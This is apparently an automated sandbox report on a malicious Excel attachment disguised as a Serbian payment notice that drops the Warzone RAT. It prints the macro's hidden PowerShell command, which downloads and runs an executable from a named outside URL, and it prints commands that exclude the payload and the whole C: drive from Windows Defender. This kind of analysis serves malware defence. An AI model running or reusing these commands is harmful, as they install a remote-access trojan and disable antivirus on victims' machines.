Analysis

  • max time kernel
    124s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-11-2022 16:58

General

  • Target

    Obavestenje o prilivu za 16000501003826304627.xls

  • Size

    128KB

  • MD5

    cadc7a1ce95a518b28bc427259034546

  • SHA1

    5f362f13ceb06e1b8e088bbaa5fba367a6bff837

  • SHA256

    51d7e9d83ee47fde362716e9c50252dff4ea3891a2cf89e4be84d1551d104688

  • SHA512

    16db805befc401a2aa5883aedfff24d9785c9df31f535221779a5d6090a22ada96025739c42ccb6ed0208b8c43015db6996dba688d95fc8b461988b2c92a6e3e

  • SSDEEP

    3072:msk3hbdlylKsgqopeJBWhZFGkE+cL2NdAnROAPDU0wERoB1HBCzEY/G0aDYKtOKW:zk3hbdlylKsgqopeJBWhZFVE+W2NdARX

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://www.voievodulgelu.ro/owncloud/index.php/s/sX8sarn7G0Cmusz/download

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

  • Warzone RAT payload 7 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 7 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of SetWindowsHookEx 15 IoCs
  • Suspicious use of WriteProcessMemory 56 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Obavestenje o prilivu za 16000501003826304627.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:5036
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('https://www.voievodulgelu.ro/owncloud/index.php/s/sX8sarn7G0Cmusz/download','Word51990.exe');Start-Process 'Word51990.exe'
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4384
      • C:\Users\Admin\Documents\Word51990.exe
        "C:\Users\Admin\Documents\Word51990.exe"
        3⤵
        • Executes dropped EXE
        • Checks computer location settings
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:548
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\Word51990.exe"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2168
        • C:\Users\Admin\Documents\Word51990.exe
          "C:\Users\Admin\Documents\Word51990.exe"
          4⤵
          • Executes dropped EXE
          PID:4144
        • C:\Users\Admin\Documents\Word51990.exe
          "C:\Users\Admin\Documents\Word51990.exe"
          4⤵
          • Executes dropped EXE
          PID:2688
        • C:\Users\Admin\Documents\Word51990.exe
          "C:\Users\Admin\Documents\Word51990.exe"
          4⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of WriteProcessMemory
          PID:1212
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell Add-MpPreference -ExclusionPath C:\
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:864
          • C:\Users\Admin\Documents\Adobe51990.exe
            "C:\Users\Admin\Documents\Adobe51990.exe"
            5⤵
            • Executes dropped EXE
            • Checks computer location settings
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2764
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\Adobe51990.exe"
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2212
            • C:\Users\Admin\Documents\Adobe51990.exe
              "C:\Users\Admin\Documents\Adobe51990.exe"
              6⤵
              • Executes dropped EXE
              PID:4168
            • C:\Users\Admin\Documents\Adobe51990.exe
              "C:\Users\Admin\Documents\Adobe51990.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:840
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell Add-MpPreference -ExclusionPath C:\
                7⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2180
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe"
                7⤵
                  PID:2296

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      3d086a433708053f9bf9523e1d87a4e8

      SHA1

      b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

      SHA256

      6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

      SHA512

      931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      eb4d127b8a6f84a1cee423c5e3e3a51d

      SHA1

      c55263a8ff097067f2393ce2120801a445fd1949

      SHA256

      d73b077e2ae7f7608ebf774fb83ab13c7bc7a5c3e4d9d96fda2bf695dc698514

      SHA512

      45a52004f8b63ac089de017437ba0e03335f18469942795d36ce3c3d017f842e582103c91e07d9af0fa8dfbbe6f2f68f2fac91383a48b6535952a8630911f21e

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      88a643c8c7a7b9f9d1ea3cce5bd0b8d5

      SHA1

      b632fdf6db58485913c32c6a8f66b83a9904145c

      SHA256

      a74c4ef42e0ecfd01f73edee4162c8eeeb31bdec43c3bc2ed5d44df5a8013ec3

      SHA512

      0ef6bbe9a87b69080ae88696fbf1b6d272babbbb5b584fbd8db3ac9b49715dc0027de24be53d21c0fdef9a3cbb0b23c0e6773083b93db7eede463682f18d210d

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      88a643c8c7a7b9f9d1ea3cce5bd0b8d5

      SHA1

      b632fdf6db58485913c32c6a8f66b83a9904145c

      SHA256

      a74c4ef42e0ecfd01f73edee4162c8eeeb31bdec43c3bc2ed5d44df5a8013ec3

      SHA512

      0ef6bbe9a87b69080ae88696fbf1b6d272babbbb5b584fbd8db3ac9b49715dc0027de24be53d21c0fdef9a3cbb0b23c0e6773083b93db7eede463682f18d210d

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      89fca251018c9ccffd8b2b7f71a4908d

      SHA1

      262ab1179876bdfdb83dd97e8463c9a0a4540b03

      SHA256

      08967d9a2680a07daf58bfd93911828ccf2776c936c8bc16a9762eef7de54afa

      SHA512

      6a79a398f036f5fbeb10b8137f2bcfaaa170747957050385f382b733591645e0c23dd231a2963984b465a9b529a4e8850ff711953fdf2278d099b7d3bdd77d97

    • C:\Users\Admin\Documents\Adobe51990.exe

      Filesize

      718KB

      MD5

      85750367cd487007195495632df84a86

      SHA1

      e234502cd367222b7d17b936e0560272a07e6686

      SHA256

      2ff7eb4c6d920d8e192fc21e83ee7297050b782b009da077a5c44aa29ae7be71

      SHA512

      d12690829208f27de02d3c57ffd8adbef3c531758b6c42390b6c76160ae3a75dec7f7dd8ffbfd4ac40220aab8204b5a97308801661672ecf8c20bb0b2a1ad203

    • C:\Users\Admin\Documents\Adobe51990.exe

      Filesize

      718KB

      MD5

      85750367cd487007195495632df84a86

      SHA1

      e234502cd367222b7d17b936e0560272a07e6686

      SHA256

      2ff7eb4c6d920d8e192fc21e83ee7297050b782b009da077a5c44aa29ae7be71

      SHA512

      d12690829208f27de02d3c57ffd8adbef3c531758b6c42390b6c76160ae3a75dec7f7dd8ffbfd4ac40220aab8204b5a97308801661672ecf8c20bb0b2a1ad203

    • C:\Users\Admin\Documents\Adobe51990.exe

      Filesize

      718KB

      MD5

      85750367cd487007195495632df84a86

      SHA1

      e234502cd367222b7d17b936e0560272a07e6686

      SHA256

      2ff7eb4c6d920d8e192fc21e83ee7297050b782b009da077a5c44aa29ae7be71

      SHA512

      d12690829208f27de02d3c57ffd8adbef3c531758b6c42390b6c76160ae3a75dec7f7dd8ffbfd4ac40220aab8204b5a97308801661672ecf8c20bb0b2a1ad203

    • C:\Users\Admin\Documents\Adobe51990.exe

      Filesize

      718KB

      MD5

      85750367cd487007195495632df84a86

      SHA1

      e234502cd367222b7d17b936e0560272a07e6686

      SHA256

      2ff7eb4c6d920d8e192fc21e83ee7297050b782b009da077a5c44aa29ae7be71

      SHA512

      d12690829208f27de02d3c57ffd8adbef3c531758b6c42390b6c76160ae3a75dec7f7dd8ffbfd4ac40220aab8204b5a97308801661672ecf8c20bb0b2a1ad203

    • C:\Users\Admin\Documents\Word51990.exe

      Filesize

      718KB

      MD5

      85750367cd487007195495632df84a86

      SHA1

      e234502cd367222b7d17b936e0560272a07e6686

      SHA256

      2ff7eb4c6d920d8e192fc21e83ee7297050b782b009da077a5c44aa29ae7be71

      SHA512

      d12690829208f27de02d3c57ffd8adbef3c531758b6c42390b6c76160ae3a75dec7f7dd8ffbfd4ac40220aab8204b5a97308801661672ecf8c20bb0b2a1ad203

    • C:\Users\Admin\Documents\Word51990.exe

      Filesize

      718KB

      MD5

      85750367cd487007195495632df84a86

      SHA1

      e234502cd367222b7d17b936e0560272a07e6686

      SHA256

      2ff7eb4c6d920d8e192fc21e83ee7297050b782b009da077a5c44aa29ae7be71

      SHA512

      d12690829208f27de02d3c57ffd8adbef3c531758b6c42390b6c76160ae3a75dec7f7dd8ffbfd4ac40220aab8204b5a97308801661672ecf8c20bb0b2a1ad203

    • C:\Users\Admin\Documents\Word51990.exe

      Filesize

      718KB

      MD5

      85750367cd487007195495632df84a86

      SHA1

      e234502cd367222b7d17b936e0560272a07e6686

      SHA256

      2ff7eb4c6d920d8e192fc21e83ee7297050b782b009da077a5c44aa29ae7be71

      SHA512

      d12690829208f27de02d3c57ffd8adbef3c531758b6c42390b6c76160ae3a75dec7f7dd8ffbfd4ac40220aab8204b5a97308801661672ecf8c20bb0b2a1ad203

    • C:\Users\Admin\Documents\Word51990.exe

      Filesize

      718KB

      MD5

      85750367cd487007195495632df84a86

      SHA1

      e234502cd367222b7d17b936e0560272a07e6686

      SHA256

      2ff7eb4c6d920d8e192fc21e83ee7297050b782b009da077a5c44aa29ae7be71

      SHA512

      d12690829208f27de02d3c57ffd8adbef3c531758b6c42390b6c76160ae3a75dec7f7dd8ffbfd4ac40220aab8204b5a97308801661672ecf8c20bb0b2a1ad203

    • C:\Users\Admin\Documents\Word51990.exe

      Filesize

      718KB

      MD5

      85750367cd487007195495632df84a86

      SHA1

      e234502cd367222b7d17b936e0560272a07e6686

      SHA256

      2ff7eb4c6d920d8e192fc21e83ee7297050b782b009da077a5c44aa29ae7be71

      SHA512

      d12690829208f27de02d3c57ffd8adbef3c531758b6c42390b6c76160ae3a75dec7f7dd8ffbfd4ac40220aab8204b5a97308801661672ecf8c20bb0b2a1ad203

    • memory/548-148-0x00000000053D0000-0x0000000005974000-memory.dmp

      Filesize

      5.6MB

    • memory/548-152-0x0000000007690000-0x000000000772C000-memory.dmp

      Filesize

      624KB

    • memory/548-147-0x00000000001F0000-0x00000000002AA000-memory.dmp

      Filesize

      744KB

    • memory/548-149-0x0000000004CC0000-0x0000000004D52000-memory.dmp

      Filesize

      584KB

    • memory/548-150-0x0000000004C50000-0x0000000004C5A000-memory.dmp

      Filesize

      40KB

    • memory/548-143-0x0000000000000000-mapping.dmp

    • memory/840-201-0x0000000000400000-0x0000000000568000-memory.dmp

      Filesize

      1.4MB

    • memory/840-197-0x0000000000000000-mapping.dmp

    • memory/840-203-0x0000000000400000-0x0000000000568000-memory.dmp

      Filesize

      1.4MB

    • memory/840-210-0x000000000AF90000-0x000000000B130000-memory.dmp

      Filesize

      1.6MB

    • memory/840-211-0x0000000000400000-0x0000000000568000-memory.dmp

      Filesize

      1.4MB

    • memory/864-177-0x00000000702A0000-0x00000000702EC000-memory.dmp

      Filesize

      304KB

    • memory/864-171-0x0000000000000000-mapping.dmp

    • memory/1212-183-0x0000000000400000-0x0000000000568000-memory.dmp

      Filesize

      1.4MB

    • memory/1212-164-0x0000000000400000-0x0000000000568000-memory.dmp

      Filesize

      1.4MB

    • memory/1212-158-0x0000000000000000-mapping.dmp

    • memory/1212-159-0x0000000000400000-0x0000000000568000-memory.dmp

      Filesize

      1.4MB

    • memory/1212-163-0x0000000000400000-0x0000000000568000-memory.dmp

      Filesize

      1.4MB

    • memory/2168-170-0x0000000006120000-0x000000000613E000-memory.dmp

      Filesize

      120KB

    • memory/2168-186-0x0000000007740000-0x0000000007748000-memory.dmp

      Filesize

      32KB

    • memory/2168-168-0x0000000005A60000-0x0000000005AC6000-memory.dmp

      Filesize

      408KB

    • memory/2168-167-0x00000000059F0000-0x0000000005A56000-memory.dmp

      Filesize

      408KB

    • memory/2168-165-0x0000000005350000-0x0000000005978000-memory.dmp

      Filesize

      6.2MB

    • memory/2168-166-0x00000000050F0000-0x0000000005112000-memory.dmp

      Filesize

      136KB

    • memory/2168-162-0x00000000027E0000-0x0000000002816000-memory.dmp

      Filesize

      216KB

    • memory/2168-172-0x00000000066E0000-0x0000000006712000-memory.dmp

      Filesize

      200KB

    • memory/2168-173-0x00000000702A0000-0x00000000702EC000-memory.dmp

      Filesize

      304KB

    • memory/2168-174-0x00000000066C0000-0x00000000066DE000-memory.dmp

      Filesize

      120KB

    • memory/2168-175-0x0000000007A60000-0x00000000080DA000-memory.dmp

      Filesize

      6.5MB

    • memory/2168-176-0x0000000007420000-0x000000000743A000-memory.dmp

      Filesize

      104KB

    • memory/2168-185-0x0000000007760000-0x000000000777A000-memory.dmp

      Filesize

      104KB

    • memory/2168-178-0x0000000007490000-0x000000000749A000-memory.dmp

      Filesize

      40KB

    • memory/2168-179-0x00000000076A0000-0x0000000007736000-memory.dmp

      Filesize

      600KB

    • memory/2168-184-0x0000000007650000-0x000000000765E000-memory.dmp

      Filesize

      56KB

    • memory/2168-153-0x0000000000000000-mapping.dmp

    • memory/2180-206-0x0000000070E10000-0x0000000070E5C000-memory.dmp

      Filesize

      304KB

    • memory/2180-205-0x0000000000000000-mapping.dmp

    • memory/2212-194-0x0000000000000000-mapping.dmp

    • memory/2212-204-0x0000000070E10000-0x0000000070E5C000-memory.dmp

      Filesize

      304KB

    • memory/2296-209-0x0000000001400000-0x0000000001401000-memory.dmp

      Filesize

      4KB

    • memory/2296-208-0x0000000000000000-mapping.dmp

    • memory/2688-156-0x0000000000000000-mapping.dmp

    • memory/2764-180-0x0000000000000000-mapping.dmp

    • memory/4144-154-0x0000000000000000-mapping.dmp

    • memory/4168-195-0x0000000000000000-mapping.dmp

    • memory/4384-142-0x00007FFF30B90000-0x00007FFF31651000-memory.dmp

      Filesize

      10.8MB

    • memory/4384-139-0x0000000000000000-mapping.dmp

    • memory/4384-146-0x00007FFF30B90000-0x00007FFF31651000-memory.dmp

      Filesize

      10.8MB

    • memory/4384-141-0x000001F04B2D0000-0x000001F04B2F2000-memory.dmp

      Filesize

      136KB

    • memory/5036-191-0x00007FFF1A650000-0x00007FFF1A660000-memory.dmp

      Filesize

      64KB

    • memory/5036-140-0x000001F471686000-0x000001F471688000-memory.dmp

      Filesize

      8KB

    • memory/5036-138-0x00007FFF17CF0000-0x00007FFF17D00000-memory.dmp

      Filesize

      64KB

    • memory/5036-137-0x00007FFF17CF0000-0x00007FFF17D00000-memory.dmp

      Filesize

      64KB

    • memory/5036-136-0x00007FFF1A650000-0x00007FFF1A660000-memory.dmp

      Filesize

      64KB

    • memory/5036-193-0x00007FFF1A650000-0x00007FFF1A660000-memory.dmp

      Filesize

      64KB

    • memory/5036-190-0x00007FFF1A650000-0x00007FFF1A660000-memory.dmp

      Filesize

      64KB

    • memory/5036-192-0x00007FFF1A650000-0x00007FFF1A660000-memory.dmp

      Filesize

      64KB

    • memory/5036-135-0x00007FFF1A650000-0x00007FFF1A660000-memory.dmp

      Filesize

      64KB

    • memory/5036-132-0x00007FFF1A650000-0x00007FFF1A660000-memory.dmp

      Filesize

      64KB

    • memory/5036-151-0x000001F471686000-0x000001F471688000-memory.dmp

      Filesize

      8KB

    • memory/5036-134-0x00007FFF1A650000-0x00007FFF1A660000-memory.dmp

      Filesize

      64KB

    • memory/5036-133-0x00007FFF1A650000-0x00007FFF1A660000-memory.dmp

      Filesize

      64KB